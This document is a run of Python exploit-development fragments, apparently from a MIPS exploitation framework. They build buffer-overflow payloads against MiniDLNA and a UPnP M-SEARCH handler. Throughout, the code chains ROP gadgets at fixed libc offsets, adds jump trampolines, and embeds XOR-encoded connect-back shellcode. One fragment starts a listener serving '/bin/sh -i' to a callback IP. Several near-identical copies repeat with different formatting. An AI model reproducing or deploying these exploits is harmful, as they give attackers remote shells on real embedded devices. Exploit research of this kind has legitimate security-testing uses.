def build_overflow(self, target_ip_address, encoder_class=None, qemu=False): badbyte_list = ['\x00'] for k in self.__class__.minidlna_badbytes.keys(): badbyte_list.append(k) sc = SectionCreator(self.endianness, badchars=badbyte_list) #Must take into account length if IP addr #since it's part of the sprintf() that overflows offset_modifier = self.offset_modifier sections = self.__class__.minidlna_rop_gadgets(self.offset_modifier, qemu) trampoline_1 = Trampoline(self.endianness, -672) section = sc.string_section( 684 - offset_modifier, trampoline_1.shellcode, description="First trampoline payload, jump back 672") sections.append(section) #1028, or 0x404, is the smallest operand to MIPS beq that #can >>2 bits and still have both bytes be non-null trampoline_2 = Trampoline(self.endianness, 1028) section = sc.string_section( 16 - offset_modifier, trampoline_2.shellcode, description="Second trampoline payload, jump forward 1028 ") sections.append(section) payload = ConnectbackPayload(self.callback_ip_address, self.endianness, port=self.port) if encoder_class: encoded_payload = encoder_class(payload, badchars=badbyte_list) payload = encoded_payload section = sc.string_section(1048 - offset_modifier, payload.shellcode, description="connect-back payload") sections.append(section) buf = OverflowBuffer(self.endianness, self.overflow_len, sections, logger=self.logger) return buf
def build_overflow(self,target_ip_address,encoder_class=None,qemu=False): badbyte_list=['\x00'] for k in self.__class__.minidlna_badbytes.keys(): badbyte_list.append(k) sc=SectionCreator(self.endianness,badchars=badbyte_list) #Must take into account length if IP addr #since it's part of the sprintf() that overflows offset_modifier=self.offset_modifier sections=self.__class__.minidlna_rop_gadgets(self.offset_modifier,qemu) trampoline_1=Trampoline(self.endianness,-672) section=sc.string_section(684-offset_modifier, trampoline_1.shellcode, description="First trampoline payload, jump back 672") sections.append(section) #1028, or 0x404, is the smallest operand to MIPS beq that #can >>2 bits and still have both bytes be non-null trampoline_2=Trampoline(self.endianness,1028) section=sc.string_section(16-offset_modifier, trampoline_2.shellcode, description="Second trampoline payload, jump forward 1028 ") sections.append(section) payload=ConnectbackPayload(self.callback_ip_address,self.endianness,port=self.port) if encoder_class: encoded_payload=encoder_class(payload,badchars=badbyte_list) payload=encoded_payload section=sc.string_section(1048-offset_modifier, payload.shellcode, description="connect-back payload") sections.append(section) buf=OverflowBuffer(self.endianness,self.overflow_len,sections,logger=self.logger) return buf
call(["./vuln", buf]) jalr $t9 ## 000233A0 addiu $a1, $sp, 28 sections.append(section) section = SC.gadget_section(572, 0x12c320, description="jump to sp pointer, load a1 to t9 " "and hump") ## 0012C320 move $t9, $a1 ## 0012C324 addiu $a0, 0x4C ## 0012C328 jr $t9 ## 0012C32C move $a1, $a2 sections.append(section) payload=ConnectbackPayload("192.168.2.200", LittleEndian) #XOR encode the payload encoded_payload=MipsXorEncoder(payload, badchars=badchars) section=SC.string_section(668, encoded_payload.shellcode, "encoded connect-back payload") sections.append(section) buf = OverflowBuffer(LittleEndian, 1024, sections) f = open('bof', 'w') f.write(str(buf)) f.close()
################################################################################ #jump into stack. jalr $s5. This needs to get loaded into the stackfinder's jalr reg ################################################################################ section=SC.gadget_section(192, 0x1B1F4, description="Jump into stack via reg $s5. make sure the stackfinder jumps to this gadget.") connectback_server=ConnectbackServer(CALLBACK_IP,port=8080,startcmd="/bin/sh -i",connectback_shell=True) payload=ConnectbackPayload(CALLBACK_IP,BigEndian,port=8080) encoded_payload=MipsXorEncoder(payload,badchars=['\0']) SC.string_section(268,encoded_payload.shellcode, description="connect back payload") buffer_overflow_string=OverflowBuffer(BigEndian,576,SC.section_list) pretty_msearch=msearch_crash.MsearchCrash(buffer_overflow_string.pretty_string()) print "\n\n"+str(pretty_msearch)+"\n\n" msearch_string=msearch_crash.MsearchCrash(buffer_overflow_string) pid=None if len(sys.argv) > 1: search_string=sys.argv[1] if "0x" == search_string[0:2]:
def build_overflow(self,target_ip_address,encoder_class=None,qemu=False): self.logger.LOG_DEBUG("offset modifier: %d" % self.offset_modifier) badbyte_list=['\x00'] for k in self.__class__.minidlna_badbytes.keys(): badbyte_list.append(k) if self.qemu: libc=self.libc_qemu else: libc=self.libc_actual offset_modifier=self.offset_modifier reg_ra=600-offset_modifier reg_s0=564-offset_modifier reg_s1=568-offset_modifier reg_s2=572-offset_modifier reg_s3=576-offset_modifier reg_s4=580-offset_modifier reg_s5=584-offset_modifier reg_s6=588-offset_modifier reg_s7=592-offset_modifier #after rop into fn epilogue new_reg_ra=640-offset_modifier new_reg_s0=628-offset_modifier new_reg_s1=632-offset_modifier new_reg_s2=636-offset_modifier SC=SectionCreator(self.endianness,base_address=libc,badchars=badbyte_list) #0x157BB0BA + 0x157BB0BA = 0x2AF76174, which should be somewhere #in libc's text segment SC.gadget_section(752-offset_modifier, 0x157BB0BA, base_address=0, description="placeholder 1 to avoid crashing memcpy.") SC.gadget_section(768-offset_modifier, 0x157BB0BA, base_address=0, description="placeholder 2 to avoid crashing memcpy.") SC.gadget_section(reg_ra,0x00028028, description="[ra] load 1 into $a0, jalr $s3") SC.gadget_section(reg_s2,0x00028028+0x7E88, description="[s2] readonly placeholder to avoid crashing rop gadget.") SC.gadget_section(reg_s3,0x0001D95C, description="[s3] load stack offset into ra, jalr $s1") SC.gadget_section(reg_s1,0x000506C0, description="[s1] address of sleep") SC.gadget_section(new_reg_ra,0x000427A8, description="[ra] load $sp+0xE0+var_C0 into $s0, jalr $s6") SC.gadget_section(reg_s6,0x0000BA84, description="[s6] jump into stack via $s0") SC.gadget_section(new_reg_s2,0x00028028, description="[s2] readonly placeholder to avoid crashing stack finder gadget.") trampoline_1=Trampoline(self.endianness,-664) section=SC.string_section(676-offset_modifier, trampoline_1.shellcode, description="First trampoline payload, jump back 664") #1028, or 0x404, is the smallest operand to MIPS beq that #can >>2 bits and still have both bytes be non-null trampoline_2=Trampoline(self.endianness,1028) section=SC.string_section(16-offset_modifier, trampoline_2.shellcode, description="Second trampoline payload, jump forward 1028 ") payload=ConnectbackPayload(self.callback_ip_address,self.endianness,port=self.port) if encoder_class: encoded_payload=encoder_class(payload,badchars=badbyte_list) payload=encoded_payload #payload has to go at 1048 since trampoline minimum forward jump is #1028. 1028+trampoline offset+4 = 1048 section=SC.string_section(1048-offset_modifier, payload.shellcode, description="connect-back payload") buf=OverflowBuffer(self.endianness,self.overflow_len,SC.section_list,logger=self.logger) return buf
def build_overflow(self, target_ip_address, encoder_class=None, qemu=False): self.logger.LOG_DEBUG("offset modifier: %d" % self.offset_modifier) badbyte_list = ['\x00'] for k in self.__class__.minidlna_badbytes.keys(): badbyte_list.append(k) if self.qemu: libc = self.libc_qemu else: libc = self.libc_actual offset_modifier = self.offset_modifier reg_ra = 600 - offset_modifier reg_s0 = 564 - offset_modifier reg_s1 = 568 - offset_modifier reg_s2 = 572 - offset_modifier reg_s3 = 576 - offset_modifier reg_s4 = 580 - offset_modifier reg_s5 = 584 - offset_modifier reg_s6 = 588 - offset_modifier reg_s7 = 592 - offset_modifier #after rop into fn epilogue new_reg_ra = 640 - offset_modifier new_reg_s0 = 628 - offset_modifier new_reg_s1 = 632 - offset_modifier new_reg_s2 = 636 - offset_modifier SC = SectionCreator(self.endianness, base_address=libc, badchars=badbyte_list) #0x157BB0BA + 0x157BB0BA = 0x2AF76174, which should be somewhere #in libc's text segment SC.gadget_section( 752 - offset_modifier, 0x157BB0BA, base_address=0, description="placeholder 1 to avoid crashing memcpy.") SC.gadget_section( 768 - offset_modifier, 0x157BB0BA, base_address=0, description="placeholder 2 to avoid crashing memcpy.") SC.gadget_section(reg_ra, 0x00028028, description="[ra] load 1 into $a0, jalr $s3") SC.gadget_section( reg_s2, 0x00028028 + 0x7E88, description= "[s2] readonly placeholder to avoid crashing rop gadget.") SC.gadget_section( reg_s3, 0x0001D95C, description="[s3] load stack offset into ra, jalr $s1") SC.gadget_section(reg_s1, 0x000506C0, description="[s1] address of sleep") SC.gadget_section( new_reg_ra, 0x000427A8, description="[ra] load $sp+0xE0+var_C0 into $s0, jalr $s6") SC.gadget_section(reg_s6, 0x0000BA84, description="[s6] jump into stack via $s0") SC.gadget_section( new_reg_s2, 0x00028028, description= "[s2] readonly placeholder to avoid crashing stack finder gadget.") trampoline_1 = Trampoline(self.endianness, -664) section = SC.string_section( 676 - offset_modifier, trampoline_1.shellcode, description="First trampoline payload, jump back 664") #1028, or 0x404, is the smallest operand to MIPS beq that #can >>2 bits and still have both bytes be non-null trampoline_2 = Trampoline(self.endianness, 1028) section = SC.string_section( 16 - offset_modifier, trampoline_2.shellcode, description="Second trampoline payload, jump forward 1028 ") payload = ConnectbackPayload(self.callback_ip_address, self.endianness, port=self.port) if encoder_class: encoded_payload = encoder_class(payload, badchars=badbyte_list) payload = encoded_payload #payload has to go at 1048 since trampoline minimum forward jump is #1028. 1028+trampoline offset+4 = 1048 section = SC.string_section(1048 - offset_modifier, payload.shellcode, description="connect-back payload") buf = OverflowBuffer(self.endianness, self.overflow_len, SC.section_list, logger=self.logger) return buf